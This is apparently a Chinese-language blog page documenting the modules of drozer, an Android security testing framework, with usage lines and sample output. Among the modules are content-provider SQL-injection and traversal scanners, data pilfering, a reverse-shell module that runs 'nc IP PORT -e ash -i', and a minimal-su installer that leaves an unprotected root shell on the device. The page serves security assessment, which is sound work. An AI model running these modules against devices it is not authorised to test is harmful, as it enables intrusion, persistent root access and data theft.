目录
模块列表
| 模块 | 作用 |
|---|---|
| auxiliary.webcontentresolver | 开启web服务来获取content providers |
| exploit.jdwp.check | 针对@jdwp-control漏洞 |
| exploit.pilfer.general.apnprovider | 获取APN信息 |
| exploit.pilfer.general.settingsprovider | 查看系统设置 |
| information.datetime | 查看设备时间 |
| information.deviceinfo | 获取设备详细信息 |
| information.permissions | 列出所有手机应用使用过的权限信息 |
| scanner.activity.browsable | 获取可以从浏览器查看的activity |
| scanner.misc.native | 列出包含native的包 |
| scanner.misc.readablefiles | 查找可被其应用读取的文件 |
| scanner.misc.secretcodes | 查找手机暗码 |
| scanner.misc.writablefiles | 查找能被其他应用写数据权限的文件 |
| scanner.provider.finduris | 查找content providers URI链接 |
| scanner.provider.injection | 查找content providers SQL注入 |
| scanner.provider.sqltables | 通过SQL注入查找表名 |
| scanner.provider.traversal | 查找目录遍历漏洞 |
| shell.exec | 执行单条shell命令 |
| shell.send | 发送ASH shell到远程监听器 |
| shell.start | 进入shell模式 |
| tools.file.download | 下载手机上的文件 |
| tools.file.md5sum | 获取文件的md5 |
| tools.file.size | 获取文件大小 |
| tools.file.upload | 从PC上传文件到设备 |
| tools.setup.busybox | 安装Busybox |
| tools.setup.minimalsu | 安装minimal-su |
auxiliary.webcontentresolver
usage: run auxiliary.webcontentresolver [-h] [-p PORT]
开启一个web服务,可以和手机上的content provider连接,还可以和sqlmap联合使用。
Examples:
dz> run auxiliary.webcontentresolver –port 8080
WebContentResolver started on port 8080.
Ctrl+C to Stop
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -p PORT, –port PORT | 设置web端口 |
exploit.jdwp.check
usage: run exploit.jdwp.check [-h]
这个模块针对一个漏洞,安卓2.3版本可调试的app都会去寻找一个叫@jdwp-control的UNIX套接字。
Examples:
dz> run exploit.jdwp.check
[+] Opened @jdwp-control
[*] Accepting connections
[+] com.mwr.dz connected!
[+] Received PID = 4931
[+] This device is vulnerable!
[+] com.mwr.dz connected!
[+] Received PID = 4940
[+] This device is vulnerable!
Last Modified: 2014-07-29
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.apnprovider
usage: run exploit.pilfer.general.apnprovider [-h]
获取APN信息, APN,全写是Access Point Name,即“接入点名称”,是您在通过手机上网时必须配置的一个参数,它决定了您的手机通过哪种接入方式来访问网络。
The target provider is content://telephony/carriers/preferapn
Examples:
dz> run exploit.pilfer.general.apnprovider
_id 1
name T-Mobile US
numeric 310260
mcc 310
mnc 260
apn epc.tmobile.com
… …
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.settingsprovider
usage: run exploit.pilfer.general.settingsprovider [-h]
查看系统设置
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.datetime
usage: run information.datetime [-h]
查看安卓设备的时间
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.deviceinfo
usage: run information.deviceinfo [-h]
获取设备详细信息
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.permissions
usage: run information.permissions [-h] [–permission PERMISSION] [–protectionlevel PROTECTIONLEVEL]
列出所有手机应用使用过的权限信息。
Examples:
dz> run information.permissions –permission android.permission.INSTALL_PACKAGES
Allows the app to install new or updated Android packages. Malicious apps may use this to add new apps with arbitrarily
powerful permissions.
18 - signature|system
Last Modified: 2014-06-17
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| –permission PERMISSION | 指定权限 |
| –protectionlevel PROTECTIONLEVEL | 指定保护等级 |
scanner.activity.browsable
usage: run scanner.activity.browsable [-a] [–package PACKAGE ][-f] [–filter FILTER ]
找出所有可浏览的activity
Package: com.android.contacts
Invocable URIs:
tel://
Classes:
.activities.PeopleActivity
com.android.contacts.NonPhoneActivity
Package: com.android.calendar
Invocable URIs:
http://www.google.com/calendar/event (PATTERN_PREFIX)
Classes:
GoogleCalendarUriIntentFilter
Package: com.android.browser
Invocable URIs:
http://
Classes:
BrowserActivity
Package: com.android.music
Invocable URIs:
http://
content://
Classes:
AudioPreview
Package: com.android.mms
Invocable URIs:
sms://
mms://
Classes:
.ui.ComposeMessageActivity
Last Modified: 2014-10-31
Credit: Tyrone (@mwrlabs)
License: BSD (3-clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a PACKAGE, –package PACKAGE | 指定包名 |
| -f FILTER, –filter FILTER | 指定关键词 |
scanner.misc.native
usage: run scanner.misc.native [-h] [-a PACKAGE] [-f FILTER] [-v]
列出包含native的包
注意: 只检查包捆绑的lib文件来判断
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a PACKAGE, –package PACKAGE | 指定包名 |
| -f FILTER, –filter FILTER | 指定关键词 |
| -v, –verbose | 显示未包含的包 |
scanner.misc.readablefiles
usage: run scanner.misc.readablefiles [-h] [-p] target
查找可被其应用读取的文件
Examples:
dz> run scanner.misc.readablefiles /data -p
Discovered world-readable files in /data:
/data/system/packages-stopped.xml
/data/system/packages.list
/data/system/packages.xml
/data/system/uiderrors.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
| 模块 | 作用 |
|---|---|
| -p, –privileged | 有root权限 |
scanner.misc.secretcodes
usage: run scanner.misc.secretcodes [-h] [-v]
查找手机暗码,具体参考:
http://blog.csdn.net/huangjuecheng/article/details/7261211?spm=5176.100239.blogcont61513.10.a86Q5r
Last Modified: 2012-11-06
Credit: Mike (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -v, –verbose | 显示详细信息 |
scanner.misc.writablefiles
usage: run scanner.misc.writablefiles [-h] [-p] target
查找能被其他应用写数据权限的文件
Examples:
dz> run scanner.misc.writablefiles /data –privileged
Discovered world-writable files in /data:
/data/anr/slow00.txt
/data/anr/slow01.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
| 模块 | 作用 |
|---|---|
| -v, –verbose | 显示详细信息 |
scanner.provider.finduris
usage: run scanner.provider.finduris [-h] [-a PACKAGE]
查找content providers URI链接
Examples:
run scanner.provider.finduris
Last Modified: 2012-11-06
Credit: Luander (luander.r@samsung.com)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a PACKAGE, –package PACKAGE | 指定包名 |
scanner.provider.injection
usage: run scanner.provider.injection [-h] [-a ]
查找SQL注入
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a , –package , –uri | 指定包名或者uri |
scanner.provider.sqltables
usage: run scanner.provider.sqltables [-h] [-a ]
Enumerate SQL tables accessible through SQL (projection) Injection vulnerabilities.
Last Modified: 2013-01-23
Credit: Rijnard
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a , –package , –uri | 指定包名或者uri |
scanner.provider.traversal
usage: run scanner.provider.traversal [-h] [-a ]
查找目录遍历漏洞
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
| 模块 | 作用 |
|---|---|
| -a , –package , –uri | 指定包名或者uri |
shell.exec
usage: run shell.exec [-h] command
执行单条shell命令
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
command the Linux command to execute
optional arguments:
-h, –help
shell.send
usage: run shell.send [-h] ip port
发送ASH shell到远程监听器
This module executes nc IP PORT -e ash -i, using BusyBox. This will send an ASH shell to a netcat listener.
Last Modified: 2013-07-25
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
positional arguments:
ip ip address of the remote listener
port port address of the remote listener
optional arguments:
-h, –help
shell.start
usage: run shell.start [-h]
进入shell模式
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.file.download
usage: run tools.file.download [-h] source destination
从手机设备下载文件到pc
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.file.md5sum
usage: run tools.file.md5sum [-h] target
md5 Checksum of File
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.size
usage: run tools.file.size [-h] target
获取文件大小
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.upload
usage: run tools.file.upload [-h] source destination
从PC上传文件到设备
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.setup.busybox
usage: run tools.setup.busybox [-h]
安装Busybox
Busybox provides a number of *nix utilities that are missing from Android. Some modules require Busybox to be installed.
Typically, you require root access to the device to install Busybox. drozer can install it from its restrictive context. You can
then use ‘busybox’ in the when executing shell commands from drozer to use it.
Last Modified: 2012-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.setup.minimalsu
usage: run tools.setup.minimalsu [-h]
Prepares ‘minimal-su’ binary installation files on the device in order to provide access to a root shell on demand.
安装minimal来可以获取暂时的root权限
This binary provides drozer the ability to maintain access to a root shell on the device after obtaining a temporary root shell
via the use of an exploit. Just type su from a shell to get a root shell.
WARNING: This minimal version of the su binary is completely unprotected, meaning that any application on the device can obtain a
root shell without any user prompting.
Examples:
dz> run tools.setup.minimalsu
[*] Uploaded minimal-su
[*] Uploaded install-minimal-su.sh
[*] chmod 770 /data/data/com.mwr.dz/install-minimal-su.sh
[*] Ready! Execute /data/data/com.mwr.dz/install-minimal-su.sh from root context to install su
…insert root exploit here…
u0_a95@android:/data/data/com.mwr.dz # /data/data/com.mwr.dz/install-minimal-su.sh
Done. You can now use su from a shell.
u0_a95@android:/data/data/com.mwr.dz # exit
u0_a95@android:/data/data/com.mwr.dz $ su
u0_a95@android:/data/data/com.mwr.dz #
Last Modified: 2013-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
568
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
